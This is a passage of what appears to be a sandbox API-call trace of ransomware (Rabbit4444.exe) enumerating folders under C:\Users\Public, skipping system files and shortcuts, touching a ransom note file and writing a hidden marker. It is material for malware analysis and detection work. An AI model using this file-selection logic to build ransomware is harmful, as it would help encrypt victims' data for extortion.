ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5ed75f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0047.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5ed75f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.993] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.993] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5ed75f7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5ed75f7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5ed75f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.993] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.994] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.994] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.994] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.994] lstrlenW (lpString="desktop.ini") returned 11 [0047.994] lstrlenW (lpString="Rabbit4444") returned 10 [0047.995] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.995] lstrlenW (lpString=".dll") returned 4 [0047.995] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.995] lstrlenW (lpString=".lnk") returned 4 [0047.995] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.995] lstrlenW (lpString=".ini") returned 4 [0047.995] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.995] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="Rabbit4444.exe") returned -1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0047.995] lstrcmpiW (lpString1="My Music", lpString2="NTUSER.DAT") returned -1 [0047.995] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0047.995] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music", dwFileAttributes=0x2412) returned 1 [0047.995] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Music\r\n") returned 53 [0047.995] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Music\r\n") returned 53 [0047.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.996] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4d0 [0047.996] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x35, lpOverlapped=0x0) returned 1 [0047.997] CloseHandle (hObject=0x278) returned 1 [0047.998] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0047.998] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="Rabbit4444.exe") returned -1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0047.999] lstrcmpiW (lpString1="My Pictures", lpString2="NTUSER.DAT") returned -1 [0047.999] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0047.999] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures", dwFileAttributes=0x2412) returned 1 [0047.999] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Pictures\r\n") returned 56 [0047.999] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Pictures\r\n") returned 56 [0047.999] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.999] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x505 [0047.999] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x38, lpOverlapped=0x0) returned 1 [0048.001] CloseHandle (hObject=0x278) returned 1 [0048.002] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="Rabbit4444.exe") returned -1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0048.002] lstrcmpiW (lpString1="My Videos", lpString2="NTUSER.DAT") returned -1 [0048.002] lstrcpyW (in: lpString1=0x130eb6c, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0048.002] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos", dwFileAttributes=0x2412) returned 1 [0048.002] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Videos\r\n") returned 54 [0048.002] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Videos\r\n") returned 54 [0048.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.003] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x53d [0048.003] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x36, lpOverlapped=0x0) returned 1 [0048.004] CloseHandle (hObject=0x278) returned 1 [0048.005] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0048.005] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0048.005] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.005] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\documents\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.005] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.006] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.006] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.006] CloseHandle (hObject=0x278) returned 1 [0048.006] CloseHandle (hObject=0x27c) returned 1 [0048.007] GetCurrentThreadId () returned 0xd98 [0048.007] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0048.007] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Desktop", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0048.007] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf75d8 | out: hHeap=0xe0000) returned 1 [0048.007] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0048.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0048.007] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0048.007] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3" [0048.007] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\desktop\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.008] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.012] FlushFileBuffers (hFile=0x27c) returned 1 [0048.013] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.013] CloseHandle (hObject=0x27c) returned 1 [0048.128] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0048.128] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.128] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe5efd872, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0048.128] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.128] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.128] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.128] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.128] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe5efd872, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.128] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.128] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.128] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.128] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.128] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.129] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5efd872, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5efd872, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5efd872, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.129] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.129] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.129] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="Rabbit4444.exe") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2=".") returned 1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="..") returned 1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="windows") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="bootmgr") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="pagefile.sys") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="boot") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="ids.txt") returned -1 [0048.129] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="NTUSER.DAT") returned -1 [0048.129] lstrcpyW (in: lpString1=0x130eb68, lpString2="Acrobat Reader DC.lnk" | out: lpString1="Acrobat Reader DC.lnk") returned="Acrobat Reader DC.lnk" [0048.129] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk", dwFileAttributes=0x0) returned 1 [0048.129] lstrlenW (lpString="Acrobat Reader DC.lnk") returned 21 [0048.129] lstrlenW (lpString="Rabbit4444") returned 10 [0048.129] lstrcmpiW (lpString1="der DC.lnk", lpString2="Rabbit4444") returned -1 [0048.129] lstrlenW (lpString=".dll") returned 4 [0048.129] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0048.130] lstrlenW (lpString=".lnk") returned 4 [0048.130] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0048.130] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.130] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.130] lstrcpyW (in: lpString1=0x130eb68, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.130] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.130] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.130] lstrlenW (lpString="desktop.ini") returned 11 [0048.130] lstrlenW (lpString="Rabbit4444") returned 10 [0048.130] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.130] lstrlenW (lpString=".dll") returned 4 [0048.131] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.131] lstrlenW (lpString=".lnk") returned 4 [0048.131] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.131] lstrlenW (lpString=".ini") returned 4 [0048.131] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.131] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Rabbit4444.exe") returned -1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootmgr") returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="pagefile.sys") returned -1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot") returned 1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ids.txt") returned -1 [0048.131] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="NTUSER.DAT") returned -1 [0048.131] lstrcpyW (in: lpString1=0x130eb68, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0048.131] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x0) returned 1 [0048.131] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0048.131] lstrlenW (lpString="Rabbit4444") returned 10 [0048.131] lstrcmpiW (lpString1="Chrome.lnk", lpString2="Rabbit4444") returned -1 [0048.131] lstrlenW (lpString=".dll") returned 4 [0048.131] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0048.131] lstrlenW (lpString=".lnk") returned 4 [0048.131] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0048.131] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, 